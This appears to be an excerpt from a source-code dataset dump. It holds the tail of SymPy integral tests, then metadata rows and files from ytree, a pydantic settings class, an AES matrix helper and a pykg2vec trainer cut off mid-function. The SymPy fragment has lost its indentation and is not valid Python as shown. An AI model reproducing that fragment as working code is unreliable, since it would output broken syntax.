raises(NotImplementedError, lambda: e.as_sum(3, method='xxxx2'))
def test_nested_doit():
e = Integral(Integral(x, x), x)
f = Integral(x, x, x)
assert e.doit() == f.doit()
def test_issue_4665():
# Allow only upper or lower limit evaluation
e = Integral(x**2, (x, None, 1))
f = Integral(x**2, (x, 1, None))
assert e.doit() == Rational(1, 3)
assert f.doit() == Rational(-1, 3)
assert Integral(x*y, (x, None, y)).subs(y, t) == Integral(x*t, (x, None, t))
assert Integral(x*y, (x, y, None)).subs(y, t) == Integral(x*t, (x, t, None))
assert integrate(x**2, (x, None, 1)) == Rational(1, 3)
assert integrate(x**2, (x, 1, None)) == Rational(-1, 3)
assert integrate("x**2", ("x", "1", None)) == Rational(-1, 3)
def test_integral_reconstruct():
e = Integral(x**2, (x, -1, 1))
assert e == Integral(*e.args)
def test_doit():
e = Integral(Integral(2*x), (x, 0, 1))
assert e.doit() == Rational(1, 3)
assert e.doit(deep=False) == Rational(1, 3)
f = Function('f')
# doesn't matter if the integral can't be performed
assert Integral(f(x), (x, 1, 1)).doit() == 0
# doesn't matter if the limits can't be evaluated
assert Integral(0, (x, 1, Integral(f(x), x))).doit() == 0
def test_issue_4884():
assert integrate(sqrt(x)*(1 + x)) == \
Piecewise(
(2*sqrt(x)*(x + 1)**2/5 - 2*sqrt(x)*(x + 1)/15 - 4*sqrt(x)/15,
Abs(x + 1) > 1),
(2*I*sqrt(-x)*(x + 1)**2/5 - 2*I*sqrt(-x)*(x + 1)/15 -
4*I*sqrt(-x)/15, True))
assert integrate(x**x*(1 + log(x))) == x**x
def test_is_number():
from sympy.abc import x, y, z
from sympy import cos, sin
assert Integral(x).is_number is False
assert Integral(1, x).is_number is False
assert Integral(1, (x, 1)).is_number is True
assert Integral(1, (x, 1, 2)).is_number is True
assert Integral(1, (x, 1, y)).is_number is False
assert Integral(x, y).is_number is False
assert Integral(x, (y, 1, x)).is_number is False
assert Integral(x, (y, 1, 2)).is_number is False
assert Integral(x, (x, 1, 2)).is_number is True
assert Integral(x, (y, 1, 1)).is_number is True
assert Integral(x*y, (x, 1, 2), (y, 1, 3)).is_number is True
assert Integral(x*y, (x, 1, 2), (y, 1, z)).is_number is False
assert Integral(x, (x, 1)).is_number is True
assert Integral(x, (x, 1, Integral(y, (y, 1, 2)))).is_number is True
# it is possible to get a false negative if the integrand is
# actually an unsimplified zero, but this is true of is_number in general.
assert Integral(sin(x)**2 + cos(x)**2 - 1, x).is_number is False
def test_symbols():
from sympy.abc import x, y, z
assert Integral(0, x).free_symbols == set()
assert Integral(x).free_symbols == set([x])
assert Integral(x, (x, None, y)).free_symbols == set([y])
assert Integral(x, (x, y, None)).free_symbols == set([y])
assert Integral(x, (x, 1, y)).free_symbols == set([y])
assert Integral(x, (x, y, 1)).free_symbols == set([y])
assert Integral(x, (x, x, y)).free_symbols == set([x, y])
assert Integral(x, x, y).free_symbols == set([x, y])
assert Integral(x, (x, 1, 2)).free_symbols == set()
assert Integral(x, (y, 1, 2)).free_symbols == set([x])
assert Integral(x, (y, z, z)).free_symbols == set()
assert Integral(x, (y, 1, 2), (y, None, None)).free_symbols == set([x, y])
assert Integral(x, (y, 1, 2), (x, 1, y)).free_symbols == set([y])
assert Integral(2, (y, 1, 2), (y, 1, x), (x, 1, 2)).free_symbols == set()
assert Integral(2, (y, x, 2), (y, 1, x), (x, 1, 2)).free_symbols == set()
assert Integral(2, (x, 1, 2), (y, x, 2), (y, 1, 2)).free_symbols == \
set([x])
def test_is_zero():
from sympy.abc import x, m, n
assert Integral(0, (x, 1, x)).is_zero
assert Integral(1, (x, 1, 1)).is_zero
assert Integral(1, (x, 1, 2)).is_zero is False
assert Integral(sin(m*x)*cos(n*x), (x, 0, 2*pi)).is_zero is None
def test_series():
from sympy.abc import x
i = Integral(cos(x), (x, x))
e = i.lseries(x)
assert i.nseries(x, n=8).removeO() == Add(*[next(e) for j in range(4)])
def test_issue_4403():
x = Symbol('x')
y = Symbol('y')
z = Symbol('z', positive=True)
assert integrate(sqrt(x**2 + z**2), x) == \
z**2*asinh(x/z)/2 + x*sqrt(x**2 + z**2)/2
assert integrate(sqrt(x**2 - z**2), x) == \
-z**2*acosh(x/z)/2 + x*sqrt(x**2 - z**2)/2
x = Symbol('x', real=True)
y = Symbol('y', nonzero=True, real=True)
assert integrate(1/(x**2 + y**2)**S('3/2'), x) == \
1/(y**2*sqrt(1 + y**2/x**2))
def test_issue_4403_2():
assert integrate(sqrt(-x**2 - 4), x) == \
-2*atan(x/sqrt(-4 - x**2)) + x*sqrt(-4 - x**2)/2
def test_issue_4100():
R = Symbol('R', positive=True)
assert integrate(sqrt(R**2 - x**2), (x, 0, R)) == pi*R**2/4
def test_issue_5167():
from sympy.abc import w, x, y, z
f = Function('f')
assert Integral(Integral(f(x), x), x) == Integral(f(x), x, x)
assert Integral(f(x)).args == (f(x), Tuple(x))
assert Integral(Integral(f(x))).args == (f(x), Tuple(x), Tuple(x))
assert Integral(Integral(f(x)), y).args == (f(x), Tuple(x), Tuple(y))
assert Integral(Integral(f(x), z), y).args == (f(x), Tuple(z), Tuple(y))
assert Integral(Integral(Integral(f(x), x), y), z).args == \
(f(x), Tuple(x), Tuple(y), Tuple(z))
assert integrate(Integral(f(x), x), x) == Integral(f(x), x, x)
assert integrate(Integral(f(x), y), x) == Integral(y*f(x), x)
assert integrate(Integral(f(x), x), y) == Integral(y*f(x), x)
assert integrate(Integral(2, x), x) == x**2
assert integrate(Integral(2, x), y) == 2*x*y
# don't re-order given limits
assert Integral(1, x, y).args != Integral(1, y, x).args
# do as many as possibble
assert Integral(f(x), y, x, y, x).doit() == Integral(y**2*f(x)/2, x, x)
assert Integral(f(x), (x, 1, 2), (w, 1, x), (z, 1, y)).doit() == \
Integral(-f(x) + y*f(x), (x, 1, 2), (w, 1, x))
def test_issue_4890():
z = Symbol('z', positive=True)
assert integrate(exp(-log(x)**2), x) == \
sqrt(pi)*exp(S(1)/4)*erf(log(x)-S(1)/2)/2
assert integrate(exp(log(x)**2), x) == \
sqrt(pi)*exp(-S(1)/4)*erfi(log(x)+S(1)/2)/2
assert integrate(exp(-z*log(x)**2), x) == \
sqrt(pi)*exp(1/(4*z))*erf(sqrt(z)*log(x) - 1/(2*sqrt(z)))/(2*sqrt(z))
def test_issue_4376():
n = Symbol('n', integer=True, positive=True)
assert simplify(integrate(n*(x**(1/n) - 1), (x, 0, S.Half)) -
(n**2 - 2**(1/n)*n**2 - n*2**(1/n))/(2**(1 + 1/n) + n*2**(1 + 1/n))) == 0
@slow
def test_issue_4517():
assert integrate((sqrt(x) - x**3)/x**Rational(1, 3), x) == \
6*x**Rational(7, 6)/7 - 3*x**Rational(11, 3)/11
def test_issue_4527():
k, m = symbols('k m', integer=True)
assert integrate(sin(k*x)*sin(m*x), (x, 0, pi)) == Piecewise(
(0, And(Eq(k, 0), Eq(m, 0))),
(-pi/2, Eq(k, -m)),
(pi/2, Eq(k, m)),
(0, True))
assert integrate(sin(k*x)*sin(m*x), (x,)) == Piecewise(
(0, And(Eq(k, 0), Eq(m, 0))),
(-x*sin(m*x)**2/2 - x*cos(m*x)**2/2 + sin(m*x)*cos(m*x)/(2*m), Eq(k, -m)),
(x*sin(m*x)**2/2 + x*cos(m*x)**2/2 - sin(m*x)*cos(m*x)/(2*m), Eq(k, m)),
(m*sin(k*x)*cos(m*x)/(k**2 - m**2) -
k*sin(m*x)*cos(k*x)/(k**2 - m**2), True))
def test_issue_4199():
ypos = Symbol('y', positive=True)
# TODO: Remove conds='none' below, let the assumption take care of it.
assert integrate(exp(-I*2*pi*ypos*x)*x, (x, -oo, oo), conds='none') == \
Integral(exp(-I*2*pi*ypos*x)*x, (x, -oo, oo))
def test_issue_3940():
a, b, c, d = symbols('a:d', positive=True, bounded=True)
assert integrate(exp(-x**2 + I*c*x), x) == \
-sqrt(pi)*exp(-c**2/4)*erf(I*c/2 - x)/2
assert integrate(exp(a*x**2 + b*x + c), x) == \
sqrt(pi)*exp(c)*exp(-b**2/(4*a))*erfi(sqrt(a)*x + b/(2*sqrt(a)))/(2*sqrt(a))
from sympy import expand_mul
from sympy.abc import k
assert expand_mul(integrate(exp(-x**2)*exp(I*k*x), (x, -oo, oo))) == \
sqrt(pi)*exp(-k**2/4)
a, d = symbols('a d', positive=True)
assert expand_mul(integrate(exp(-a*x**2 + 2*d*x), (x, -oo, oo))) == \
sqrt(pi)*exp(d**2/a)/sqrt(a)
def test_issue_5413():
# Note that this is not the same as testing ratint() becuase integrate()
# pulls out the coefficient.
assert integrate(-a/(a**2 + x**2), x) == I*log(-I*a + x)/2 - I*log(I*a + x)/2
def test_issue_4892a():
A, z = symbols('A z')
c = Symbol('c', nonzero=True)
P1 = -A*exp(-z)
P2 = -A/(c*t)*(sin(x)**2 + cos(y)**2)
h1 = -sin(x)**2 - cos(y)**2
h2 = -sin(x)**2 + sin(y)**2 - 1
# there is still some non-deterministic behavior in integrate
# or trigsimp which permits one of the following
assert integrate(c*(P2 - P1), t) in [
c*(-A*(-h1)*log(c*t)/c + A*t*exp(-z)),
c*(-A*(-h2)*log(c*t)/c + A*t*exp(-z)),
c*( A* h1 *log(c*t)/c + A*t*exp(-z)),
c*( A* h2 *log(c*t)/c + A*t*exp(-z)),
(A*c*t - A*(-h1)*log(t)*exp(z))*exp(-z),
(A*c*t - A*(-h2)*log(t)*exp(z))*exp(-z),
]
def test_issue_4892b():
# Issues relating to issue 4596 are making the actual result of this hard
# to test. The answer should be something like
#
# (-sin(y) + sqrt(-72 + 48*cos(y) - 8*cos(y)**2)/2)*log(x + sqrt(-72 +
# 48*cos(y) - 8*cos(y)**2)/(2*(3 - cos(y)))) + (-sin(y) - sqrt(-72 +
# 48*cos(y) - 8*cos(y)**2)/2)*log(x - sqrt(-72 + 48*cos(y) -
# 8*cos(y)**2)/(2*(3 - cos(y)))) + x**2*sin(y)/2 + 2*x*cos(y)
expr = (sin(y)*x**3 + 2*cos(y)*x**2 + 12)/(x**2 + 2)
assert trigsimp(factor(integrate(expr, x).diff(x) - expr)) == 0
def test_issue_5178():
assert integrate(sin(x)*f(y, z), (x, 0, pi), (y, 0, pi), (z, 0, pi)) == \
Integral(2*f(y, z), (y, 0, pi), (z, 0, pi))
def test_integrate_series():
f = sin(x).series(x, 0, 10)
g = x**2/2 - x**4/24 + x**6/720 - x**8/40320 + x**10/3628800 + O(x**11)
assert integrate(f, x) == g
assert diff(integrate(f, x), x) == f
assert integrate(O(x**5), x) == O(x**6)
def test_atom_bug():
from sympy import meijerg
from sympy.integrals.heurisch import heurisch
assert heurisch(meijerg([], [], [1], [], x), x) is None
def test_limit_bug():
z = Symbol('z', nonzero=True)
assert integrate(sin(x*y*z), (x, 0, pi), (y, 0, pi)) == \
(log(z**2) + 2*EulerGamma + 2*log(pi))/(2*z) - \
(-log(pi*z) + log(pi**2*z**2)/2 + Ci(pi**2*z))/z + log(pi)/z
def test_issue_4703():
g = Function('g')
assert integrate(exp(x)*g(x), x).has(Integral)
def test_issue_1888():
f = Function('f')
assert integrate(f(x).diff(x)**2, x).has(Integral)
# The following tests work using meijerint.
def test_issue_3558():
from sympy import Si
assert integrate(cos(x*y), (x, -pi/2, pi/2), (y, 0, pi)) == 2*Si(pi**2/2)
def test_issue_4422():
assert integrate(1/sqrt(16 + 4*x**2), x) == asinh(x/2) / 2
def test_issue_4493():
from sympy import simplify
assert simplify(integrate(x*sqrt(1 + 2*x), x)) == \
sqrt(2*x + 1)*(6*x**2 + x - 1)/15
def test_issue_4737():
assert integrate(sin(x)/x, (x, -oo, oo)) == pi
assert integrate(sin(x)/x, (x, 0, oo)) == pi/2
def test_issue_4992():
from sympy import simplify, expand_func, polygamma, gamma
a = Symbol('a', positive=True)
assert simplify(expand_func(integrate(exp(-x)*log(x)*x**a, (x, 0, oo)))) == \
(a*polygamma(0, a) + 1)*gamma(a)
def test_issue_4487():
from sympy import lowergamma, simplify
assert simplify(integrate(exp(-x)*x**y, x)) == lowergamma(y + 1, x)
@XFAIL
def test_issue_4215():
x = Symbol("x")
assert integrate(1/(x**2), (x, -1, 1)) == oo
def test_issue_4400():
n = Symbol('n', integer=True, positive=True)
assert integrate((x**n)*log(x), x) == \
n*x*x**n*log(x)/(n**2 + 2*n + 1) + x*x**n*log(x)/(n**2 + 2*n + 1) - \
x*x**n/(n**2 + 2*n + 1)
def test_issue_6253():
# Note: this used to raise NotImplementedError
assert integrate((sqrt(1 - x) + sqrt(1 + x))**2/x, x, meijerg=True) == \
Integral((sqrt(-x + 1) + sqrt(x + 1))**2/x, x)
def test_issue_4153():
assert integrate(1/(1 + x + y + z), (x, 0, 1), (y, 0, 1), (z, 0, 1)) in [
-12*log(3) - 3*log(6)/2 + 3*log(8)/2 + 5*log(2) + 7*log(4),
6*log(2) + 8*log(4) - 27*log(3)/2, 22*log(2) - 27*log(3)/2,
-12*log(3) - 3*log(6)/2 + 47*log(2)/2]
def test_issue_4326():
R, b, h = symbols('R b h')
# It doesn't matter if we can do the integral. Just make sure the result
# doesn't contain nan. This is really a test against _eval_interval.
assert not integrate(((h*(x - R + b))/b)*sqrt(R**2 - x**2), (x, R - b, R)).has(nan)
def test_powers():
assert integrate(2**x + 3**x, x) == 2**x/log(2) + 3**x/log(3)
def test_risch_option():
# risch=True only allowed on indefinite integrals
raises(ValueError, lambda: integrate(1/log(x), (x, 0, oo), risch=True))
assert integrate(exp(-x**2), x, risch=True) == NonElementaryIntegral(exp(-x**2), x)
assert integrate(log(1/x)*y, x, y, risch=True) == y**2*(x*log(1/x)/2 + x/2)
assert integrate(erf(x), x, risch=True) == Integral(erf(x), x)
# TODO: How to test risch=False?
def test_issue_6828():
# TODO: Currently `h' is the result (all three are equivalent). Improve
# simplify() to find the form with simplest real coefficients.
f = 1/(1.08*x**2 - 4.3)
g = 300.0/(324.0*x**2 - 1290.0)
h = 0.925925925925926/(1.0*x**2 - 3.98148148148148)
assert integrate(f, x).diff(x).simplify().equals(f) is True
@XFAIL
def test_integrate_Piecewise_rational_over_reals():
f = Piecewise(
(0, t - 478.515625*pi < 0),
(13.2075145209219*pi/(0.000871222*t + 0.995)**2, t - 478.515625*pi >= 0))
assert integrate(f, (t, 0, oo)) == 15235.9375*pi
def test_issue_4803():
x_max = Symbol("x_max")
assert integrate(y/pi*exp(-(x_max - x)/cos(a)), x) == \
y*exp((x - x_max)/cos(a))*cos(a)/pi
def test_issue_4234():
assert integrate(1/sqrt(1 + tan(x)**2)) == tan(x) / sqrt(1 + tan(x)**2)
def test_issue_4492():
assert simplify(integrate(x**2 * sqrt(5 - x**2), x)) == Piecewise(
(I*(2*x**5 - 15*x**3 + 25*x - 25*sqrt(x**2 - 5)*acosh(sqrt(5)*x/5)) /
(8*sqrt(x**2 - 5)), Abs(x**2)/5 > 1),
((-2*x**5 + 15*x**3 - 25*x + 25*sqrt(-x**2 + 5)*asin(sqrt(5)*x/5)) /
(8*sqrt(-x**2 + 5)), True))
| 36.589567 | 89 | 0.54195 |
207bf94fb379346d0bce08acc3c5d849b81ba575 | 1,049 | py | Python | services/classes.py | TimurBaldin/FinesWebParser | 4b0155e21f054efcfde173c01f636a634f16298b | [
"Apache-2.0"
] | null | null | null | services/classes.py | TimurBaldin/FinesWebParser | 4b0155e21f054efcfde173c01f636a634f16298b | [
"Apache-2.0"
] | null | null | null | services/classes.py | TimurBaldin/FinesWebParser | 4b0155e21f054efcfde173c01f636a634f16298b | [
"Apache-2.0"
] | null | null | null | from pydantic.main import BaseModel
from enum import Enum
class CarDetailsDto:
def __init__(self, reg_num, reg_reg, sts_num, count=3):
self.reg_num = reg_num
self.reg_reg = reg_reg
self.sts_num = sts_num
self.__count = count
self.__active = True
self.__msg = None
self.__id=None
def get_count(self):
return self.__count
def decrement(self):
self.__count = self.__count - 1
def get_active_status(self):
return self.__active
def set_active_status(self, new_status):
self.__active = new_status
def set_img_data(self, msg):
self.__msg = msg
def get_img_data(self):
return self.__msg
def set_id(self,id):
self.__id=id
def get_id(self):
return self.__id
def __repr__(self):
return str(self.__dict__)
class Settings(BaseModel):
useLocalDriver = False
countOfProcess = 1
timeout = 15
class BrowserType(Enum):
FIREFOX = "FIREFOX"
SELENOID = "SELENOID"
| 19.072727 | 59 | 0.630124 |
e2eb5c2b25874519a738eddcdcddd0266ad568cd | 4,483 | py | Python | ytree/frontends/consistent_trees/utilities.py | ytree-project/ytree | 4ba1d3e6efd1e647c594b2c0de51b0217de7a45c | [
"BSD-3-Clause-Clear"
] | 3 | 2020-02-28T10:25:39.000Z | 2021-04-13T07:18:35.000Z | ytree/frontends/consistent_trees/utilities.py | ytree-project/ytree | 4ba1d3e6efd1e647c594b2c0de51b0217de7a45c | [
"BSD-3-Clause-Clear"
] | 36 | 2019-12-03T17:33:29.000Z | 2022-02-18T10:39:25.000Z | ytree/frontends/consistent_trees/utilities.py | ytree-project/ytree | 4ba1d3e6efd1e647c594b2c0de51b0217de7a45c | [
"BSD-3-Clause-Clear"
] | 6 | 2019-08-22T16:01:34.000Z | 2020-08-25T09:57:17.000Z | """
ConsistentTreesArbor utility functions
"""
#-----------------------------------------------------------------------------
# Copyright (c) ytree development team. All rights reserved.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#-----------------------------------------------------------------------------
import re
from unyt.exceptions import \
UnitParseError
def parse_ctrees_header(arbor, input_stream,
ntrees_in_file=True):
"""
Parse consistent-trees header information.
Parse ascii text from a file or list of strings to get:
- cosmology parameters
- box size
- fields and units
- optionally, number of trees and end of header file offset
Return a dictionary of field information.
"""
fields = []
fi = {}
fdb = {}
rems = [f"{s[0]}{t}{s[1]}"
for s in [("(", ")"), ("", "")]
for t in ["physical, peculiar",
"comoving", "physical"]]
if isinstance(input_stream, str):
f = open(input_stream, mode='r')
is_file = True
else:
is_file = False
def next_line():
if is_file:
return f.readline()
else:
return input_stream.pop(0) \
if input_stream else None
# Read the first line as a list of all fields.
# Do some footwork to remove awkard characters.
rfl = next_line()[1:].strip().split()
reg = re.compile(r"\(\d+\)$")
for pf in rfl:
match = reg.search(pf)
if match is None:
fields.append(pf)
else:
fields.append(pf[:match.start()])
# Now grab a bunch of things from the header.
while True:
line = next_line()
if line is None:
if ntrees_in_file:
raise IOError(
f"Encountered enexpected EOF reading {input_stream}.")
else:
break
elif not line.startswith("#"):
if ntrees_in_file:
arbor._size = int(line.strip())
arbor._hoffset = f.tell()
break
# cosmological parameters
if "Omega_M" in line:
pars = line[1:].split(";")
for j, par in enumerate(["omega_matter",
"omega_lambda",
"hubble_constant"]):
v = float(pars[j].split(" = ")[1])
setattr(arbor, par, v)
# box size
elif "Full box size" in line:
pars = line.split("=")[1].strip().split()
box = pars
# These are lines describing the various fields.
# Pull them apart and look for units.
elif ":" in line:
tfields, desc = line[1:].strip().split(":", 1)
# Units are enclosed in parentheses.
# Pull out what's enclosed and remove things like
# "comoving" and "physical".
if "(" in line and ")" in line:
punits = desc[desc.find("(")+1:desc.rfind(")")]
for rem in rems:
while rem in punits:
pre, mid, pos = punits.partition(rem)
punits = pre + pos
try:
arbor.quan(1, punits)
except UnitParseError:
punits = ""
else:
punits = ""
# Multiple fields together on the same line.
for sep in ["/", ","]:
if sep in tfields:
tfields = tfields.split(sep)
break
if not isinstance(tfields, list):
tfields = [tfields]
# Assign units and description.
for tfield in tfields:
fdb[tfield.lower()] = {"description": desc.strip(),
"units": punits}
if is_file:
f.close()
# Fill the field info with the units found above.
for i, field in enumerate(fields):
if "(" in field and ")" in field:
cfield = field[:field.find("(")]
else:
cfield = field
fi[field] = fdb.get(cfield.lower(),
{"description": "",
"units": ""})
fi[field]["column"] = i
arbor.box_size = arbor.quan(float(box[0]), box[1])
return fi
| 30.917241 | 78 | 0.478028 |
4f3879a175716957860a50a932e7b7354f79bbe1 | 893 | py | Python | aesjosephus/matrix.py | WingedSeal/AES_Josephus | 7868fc798cce6b297c7cfd3c2f251276dd2323ac | [
"MIT"
] | 1 | 2021-12-20T06:57:09.000Z | 2021-12-20T06:57:09.000Z | aesjosephus/matrix.py | WingedSeal/AES_Josephus | 7868fc798cce6b297c7cfd3c2f251276dd2323ac | [
"MIT"
] | null | null | null | aesjosephus/matrix.py | WingedSeal/AES_Josephus | 7868fc798cce6b297c7cfd3c2f251276dd2323ac | [
"MIT"
] | null | null | null | import numpy as np
class Matrix:
@property
def array(self):
return self._state
def __init__(self, state: np.ndarray) -> np.ndarray:
if state.shape != (4,4):
raise ValueError(f"State need to be 4x4 matrix. ({state.shape} shape was given)")
self._state = state.astype("uint8")
return self._state
def __repr__(self) -> str:
return f"{self.__class__.__name__}(array=\n{np.array2string(self._state, separator=', ')})"
def __str__(self) -> str:
array = self._state
return f"""
| {array[0,0]:02x} {array[0,1]:02x} {array[0,2]:02x} {array[0,3]:02x} |
| {array[1,0]:02x} {array[1,1]:02x} {array[1,2]:02x} {array[1,3]:02x} |
| {array[2,0]:02x} {array[2,1]:02x} {array[2,2]:02x} {array[2,3]:02x} |
| {array[3,0]:02x} {array[3,1]:02x} {array[3,2]:02x} {array[3,3]:02x} |
"""
| 34.346154 | 99 | 0.56103 |
06bc176563f0a9b515db9b4c44cfbeb1c397d3cd | 167 | py | Python | clubes/admin.py | JohnVictor2017/StartTm | 91a6f60ffd36f25f01d75798c5ef83e7dc44d97d | [
"MIT"
] | null | null | null | clubes/admin.py | JohnVictor2017/StartTm | 91a6f60ffd36f25f01d75798c5ef83e7dc44d97d | [
"MIT"
] | null | null | null | clubes/admin.py | JohnVictor2017/StartTm | 91a6f60ffd36f25f01d75798c5ef83e7dc44d97d | [
"MIT"
] | null | null | null | from django.contrib import admin
from clubes.models import Clube,AtletaClube
# Register your models here.
admin.site.register(Clube)
admin.site.register(AtletaClube) | 23.857143 | 43 | 0.826347 |
b8f5fb402359202d43256afb75e45a5f8443d27f | 20,873 | py | Python | pykg2vec/utils/trainer.py | baxtree/pykg2vec | 59498ed5aae7cbe44f881b2c807fb02f1b53999d | [
"MIT"
] | 1 | 2020-10-11T21:52:51.000Z | 2020-10-11T21:52:51.000Z | pykg2vec/utils/trainer.py | KonstantinKlepikov/pykg2vec | 658b70a54a371f79252550b0cad7e19578198505 | [
"MIT"
] | null | null | null | pykg2vec/utils/trainer.py | KonstantinKlepikov/pykg2vec | 658b70a54a371f79252550b0cad7e19578198505 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import warnings
import torch
import numpy as np
import torch.optim as optim
import torch.nn as nn
import torch.nn.functional as F
import pandas as pd
from tqdm import tqdm
from pathlib import Path
from pykg2vec.utils.evaluator import Evaluator
from pykg2vec.utils.visualization import Visualization
from pykg2vec.data.generator import Generator
from pykg2vec.utils.logger import Logger
from pykg2vec.common import Monitor, TrainingStrategy
warnings.filterwarnings('ignore')
class EarlyStopper:
""" Class used by trainer for handling the early stopping mechanism during the training of KGE algorithms.
Args:
patience (int): Number of epochs to wait before early stopping the training on no improvement.
No early stopping if it is a negative number (default: {-1}).
monitor (Monitor): the type of metric that earlystopper will monitor.
"""
_logger = Logger().get_logger(__name__)
def __init__(self, patience, monitor):
self.monitor = monitor
self.patience = patience
# controlling variables.
self.previous_metrics = None
self.patience_left = patience
def should_stop(self, curr_metrics):
should_stop = False
value, name = self.monitor.value, self.monitor.name
if self.previous_metrics is not None:
if self.monitor == Monitor.MEAN_RANK or self.monitor == Monitor.FILTERED_MEAN_RANK:
is_worse = self.previous_metrics[value] < curr_metrics[value]
else:
is_worse = self.previous_metrics[value] > curr_metrics[value]
if self.patience_left > 0 and is_worse:
self.patience_left -= 1
self._logger.info(
'%s more chances before the trainer stops the training. (prev_%s, curr_%s): (%.4f, %.4f)' %
(self.patience_left, name, name, self.previous_metrics[value], curr_metrics[value]))
elif self.patience_left == 0 and is_worse:
self._logger.info('Stop the training.')
should_stop = True
else:
self._logger.info('Reset the patience count to %d' % (self.patience))
self.patience_left = self.patience
self.previous_metrics = curr_metrics
return should_stop
class Trainer:
""" Class for handling the training of the algorithms.
Args:
model (object): KGE model object
Examples:
>>> from pykg2vec.utils.trainer import Trainer
>>> from pykg2vec.models.TransE import TransE
>>> trainer = Trainer(TransE())
>>> trainer.build_model()
>>> trainer.train_model()
"""
TRAINED_MODEL_FILE_NAME = "model.vec.pt"
TRAINED_MODEL_CONFIG_NAME = "config.npy"
_logger = Logger().get_logger(__name__)
def __init__(self, model, config):
self.model = model
self.config = config
self.best_metric = None
self.monitor = None
self.training_results = []
self.evaluator = None
self.generator = None
self.optimizer = None
self.early_stopper = None
def build_model(self, monitor=Monitor.FILTERED_MEAN_RANK):
"""function to build the model"""
if self.config.load_from_data is not None:
self.load_model(self.config.load_from_data)
self.evaluator = Evaluator(self.model, self.config)
self.model.to(self.config.device)
if self.config.optimizer == "adam":
self.optimizer = optim.Adam(
self.model.parameters(),
lr=self.config.learning_rate,
)
elif self.config.optimizer == "sgd":
self.optimizer = optim.SGD(
self.model.parameters(),
lr=self.config.learning_rate,
)
elif self.config.optimizer == "adagrad":
self.optimizer = optim.Adagrad(
self.model.parameters(),
lr=self.config.learning_rate,
)
elif self.config.optimizer == "rms":
self.optimizer = optim.RMSprop(
self.model.parameters(),
lr=self.config.learning_rate,
)
else:
raise NotImplementedError("No support for %s optimizer" % self.config.optimizer)
self.config.summary()
self.early_stopper = EarlyStopper(self.config.patience, monitor)
# Training related functions:
def train_step_pairwise(self, pos_h, pos_r, pos_t, neg_h, neg_r, neg_t):
pos_preds = self.model(pos_h, pos_r, pos_t)
neg_preds = self.model(neg_h, neg_r, neg_t)
if self.config.sampling == 'adversarial_negative_sampling':
# RotatE: Adversarial Negative Sampling and alpha is the temperature.
pos_preds = -pos_preds
neg_preds = -neg_preds
pos_preds = F.logsigmoid(pos_preds)
neg_preds = neg_preds.view((-1, self.config.neg_rate))
softmax = nn.Softmax(dim=1)(neg_preds*self.config.alpha).detach()
neg_preds = torch.sum(softmax * (F.logsigmoid(-neg_preds)), dim=-1)
loss = -neg_preds.mean() - pos_preds.mean()
else:
# others that use margin-based & pairwise loss function. (uniform or bern)
loss = pos_preds + self.config.margin - neg_preds
loss = torch.max(loss, torch.zeros_like(loss)).sum()
if hasattr(self.model, 'get_reg'):
# now only NTN uses regularizer,
# other pairwise based KGE methods use normalization to regularize parameters.
loss += self.model.get_reg()
return loss
def train_step_projection(self, h, r, t, hr_t, tr_h):
if self.model.model_name.lower() == "conve" or self.model.model_name.lower() == "tucker":
if hasattr(self.config, 'label_smoothing'):
hr_t = hr_t * (1.0 - self.config.label_smoothing) + 1.0 / self.config.tot_entity
tr_h = tr_h * (1.0 - self.config.label_smoothing) + 1.0 / self.config.tot_entity
pred_tails = self.model(h, r, direction="tail") # (h, r) -> hr_t forward
pred_heads = self.model(t, r, direction="head") # (t, r) -> tr_h backward
loss_tails = torch.mean(F.binary_cross_entropy(pred_tails, hr_t))
loss_heads = torch.mean(F.binary_cross_entropy(pred_heads, tr_h))
loss = loss_tails + loss_heads
else:
loss_tails = self.model(h, r, hr_t, direction="tail") # (h, r) -> hr_t forward
loss_heads = self.model(t, r, tr_h, direction="head") # (t, r) -> tr_h backward
loss = loss_tails + loss_heads
if hasattr(self.model, 'get_reg'):
# now only complex distmult uses regularizer in algorithms,
loss += self.model.get_reg()
return loss
def train_step_pointwise(self, h, r, t, y):
preds = self.model(h, r, t)
loss = F.softplus(y*preds).mean()
if hasattr(self.model, 'get_reg'): # for complex & complex-N3 & DistMult & CP & ANALOGY
loss += self.model.get_reg(h, r, t)
return loss
def train_model(self):
# for key, value in self.config.__dict__.items():
# print(key," ",value)
#print(self.config.__dict__[""])
# pdb.set_trace()
"""Function to train the model."""
self.generator = Generator(self.model, self.config)
self.monitor = Monitor.FILTERED_MEAN_RANK
for cur_epoch_idx in range(self.config.epochs):
self._logger.info("Epoch[%d/%d]" % (cur_epoch_idx, self.config.epochs))
self.train_model_epoch(cur_epoch_idx)
if cur_epoch_idx % self.config.test_step == 0:
self.model.eval()
metrics = self.evaluator.mini_test(cur_epoch_idx)
if self.early_stopper.should_stop(metrics):
### Early Stop Mechanism
### start to check if the metric is still improving after each mini-test.
### Example, if test_step == 5, the trainer will check metrics every 5 epoch.
break
# store the best model weights.
if self.config.save_model:
if self.best_metric is None:
self.best_metric = metrics
self.save_model()
else:
if self.monitor == Monitor.MEAN_RANK or self.monitor == Monitor.FILTERED_MEAN_RANK:
is_better = self.best_metric[self.monitor.value] > metrics[self.monitor.value]
else:
is_better = self.best_metric[self.monitor.value] < metrics[self.monitor.value]
if is_better:
self.save_model()
self.best_metric = metrics
self.evaluator.full_test(cur_epoch_idx)
self.evaluator.metric_calculator.save_test_summary(self.model.model_name)
self.generator.stop()
self.save_training_result()
# if self.config.save_model:
# self.save_model()
if self.config.disp_result:
self.display()
self.export_embeddings()
return cur_epoch_idx # the runned epoches.
def tune_model(self):
"""Function to tune the model."""
current_loss = float("inf")
self.generator = Generator(self.model, self.config)
self.evaluator = Evaluator(self.model, self.config, tuning=True)
for cur_epoch_idx in range(self.config.epochs):
current_loss = self.train_model_epoch(cur_epoch_idx, tuning=True)
self.evaluator.full_test(cur_epoch_idx)
self.generator.stop()
return current_loss
def train_model_epoch(self, epoch_idx, tuning=False):
"""Function to train the model for one epoch."""
acc_loss = 0
num_batch = self.config.tot_train_triples // self.config.batch_size if not self.config.debug else 10
self.generator.start_one_epoch(num_batch)
progress_bar = tqdm(range(num_batch))
for _ in progress_bar:
data = list(next(self.generator))
self.model.train()
self.optimizer.zero_grad()
if self.model.training_strategy == TrainingStrategy.PROJECTION_BASED:
h = torch.LongTensor(data[0]).to(self.config.device)
r = torch.LongTensor(data[1]).to(self.config.device)
t = torch.LongTensor(data[2]).to(self.config.device)
